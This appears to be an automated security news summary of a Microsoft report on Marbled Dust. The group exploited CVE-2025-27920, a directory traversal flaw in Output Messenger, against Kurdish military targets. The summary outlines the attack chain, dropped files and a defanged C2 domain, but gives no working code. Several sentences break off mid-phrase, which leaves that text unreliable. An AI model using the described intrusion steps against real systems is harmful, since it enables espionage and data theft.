Listen to this Post
Introduction:
A covert cyber-espionage campaign linked to Turkish government interests has come to light, with a hacker group identified as “Marbled Dust” exploiting a zero-day vulnerability in Output Messenger, a popular multi-platform chat solution. This sophisticated operation, uncovered by Microsoft Threat Intelligence, has primarily targeted unpatched systems connected to the Kurdish military in Iraq, signaling a dangerous escalation in regional cyber conflict. The attack takes advantage of a directory traversal flaw in Output Messenger, enabling the attackers to gain unauthorized access, exfiltrate data, and deploy backdoors.
Key Points and Breakdown of the Incident:
Microsoft has identified a state-aligned threat group known as Marbled Dust exploiting a previously unknown flaw in Output Messenger.
The vulnerability exploited, CVE-2025-27920, involves directory traversal and was found in versions prior to 2.0.63.
Attackers can exploit the flaw using “../” sequences to gain access to files outside the normal directory scope.
This campaign began as early as April 2024, long before the vulnerability was patched.
Output Messenger’s developer, Srimax, issued a patch (v2.0.63) in December 2024, but exploitation continued on unpatched systems.
Microsoft assesses that the primary targets are associated with the Kurdish military in Iraq, indicating the cyberattack’s geopolitical motive.
Attackers used stolen credentials via DNS hijacking or typo-squatting to access Output Messenger’s Server Manager application.
Once inside, malicious files such as OM.vbs, OMServerService.vbs, and OMServerService.exe are deployed.
The malware communicates with a hardcoded C2 domain (api.wordinfos[.]com) for data extraction.
Another vulnerability, CVE-2025-27921, was patched but hasn’t been observed in active exploitation yet.
The attack chain includes a Golang-based backdoor capable of executing remote commands and stealing data.
Malware also utilizes
Marbled Dust’s infrastructure links to previous campaigns dating back to 2019, with overlaps with other groups like Sea Turtle and UNC1326.
The group has a history of targeting Middle Eastern and European governmental and telecom institutions.
Past tactics included DNS manipulation to intercept and reuse stolen credentials across different targets.
Microsoft labels this attack as a technological escalation, suggesting Marbled Dust’s evolving skillset.
Their use of a zero-day marks a significant leap in capability and possibly urgency in their objectives.
The vulnerability entry on CVE.org remains incomplete as of May 2025, lacking a severity score (CVSS).
Srimax and Microsoft jointly addressed the vulnerability, but many systems remain vulnerable due to delayed patching.
The malware operates on both server and client sides, making it particularly stealthy and effective in persistent threats.
Data exfiltration tactics indicate a focus on gathering intelligence, not financial gain.
Targets’ geographical location and affiliations suggest a strategic interest in military intelligence rather than broad-based attacks.
Exploitation relies heavily on initial credential theft, emphasizing the importance of DNS hygiene and password security.
Backdoor activity is coded in Go, which is increasingly favored by APT groups for its cross-platform utility.
Campaign consistency and infrastructure reuse tie this incident to Marbled Dust’s well-documented modus operandi.
This incident demonstrates the danger of slow patch adoption and poor vulnerability awareness across enterprise systems.
With no enrichment data or CVSS score yet available, it’s harder for cybersecurity teams to prioritize defenses.
The group’s activity continues post-patch, revealing widespread lag in system updates in targeted sectors.
Intelligence gathered could be used for military operations, surveillance, or diplomatic leverage.
The
What Undercode Say:
The Marbled Dust campaign reflects a troubling intersection of cyber warfare, geopolitics, and systemic neglect in cybersecurity maintenance. This operation wasn’t a brute-force attack or a random scan of internet-facing apps. It was a precision strike exploiting a zero-day flaw in a widely-used communication tool, targeting a specific ethnic-military group in a volatile region. This aligns with a broader pattern of cyber operations functioning as tools of political influence or suppression, especially in disputed regions like northern Iraq.
What’s especially alarming is that Microsoft discovered and reported the vulnerability, and even after a patch was released, exploitation persisted. This underscores two critical issues: first, the global inconsistency in applying security patches, and second, the underappreciated threat posed by seemingly minor enterprise apps like Output Messenger.
The strategic use of a directory traversal exploit allowed attackers to reach beyond intended app boundaries and inject a custom Golang-based backdoor with alarming effectiveness. The malware’s connection to a hardcoded C2 domain and use of plink for file transfer suggest a sophisticated understanding of covert data exfiltration methods. These aren’t script kiddies—they’re operatives running full-fledged cyberespionage operations.
Marbled Dust has gradually evolved from DNS manipulation and infrastructure scanning to full exploitation cycles using custom malware. Their use of typo-squatted domains shows an understanding of human error, while DNS hijacking tactics continue to be effective in credential theft. In this campaign, credentials were the front door, and CVE-2025-27920 was the skeleton key to the vault.
This incident also highlights the risks posed by vulnerable internal communication systems. Organizations often overlook tools like Output Messenger when thinking about critical assets, but this breach proves they can be gateways into much larger systems.
From an operational standpoint, the longevity of the campaign—active for over a year before discovery—demonstrates excellent OPSEC on Marbled Dust’s part. Their infrastructure overlap with groups like Sea Turtle and Teal Kurma suggests a possible coalition of state-aligned actors or at least shared resources and tactics.
This report should be a wake-up call for security teams, especially those operating in high-risk geopolitical areas. Even relatively obscure software can become the Achilles’ heel of a well-defended organization. The missing severity score and incomplete CVE documentation exacerbate the risk, as security professionals might deprioritize this vulnerability compared to flashier threats.
In sum, this is cyber warfare dressed in business software. It’s a case study in modern espionage and a reminder that your organization’s weakest link might not be your firewall—it might be your chat client.
Fact Checker Results:
Microsoft Threat Intelligence officially reported the campaign and attributed it to Marbled Dust.
The vulnerability CVE-2025-27920 is confirmed, but details remain incomplete in public databases.
Srimax has issued patches, yet exploitation continues due to slow adoption across affected systems.
Prediction:
Given Marbled
References:
Reported By: www.infosecurity-magazine.com
Extra Source Hub:
https://www.reddit.com
Wikipedia
Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
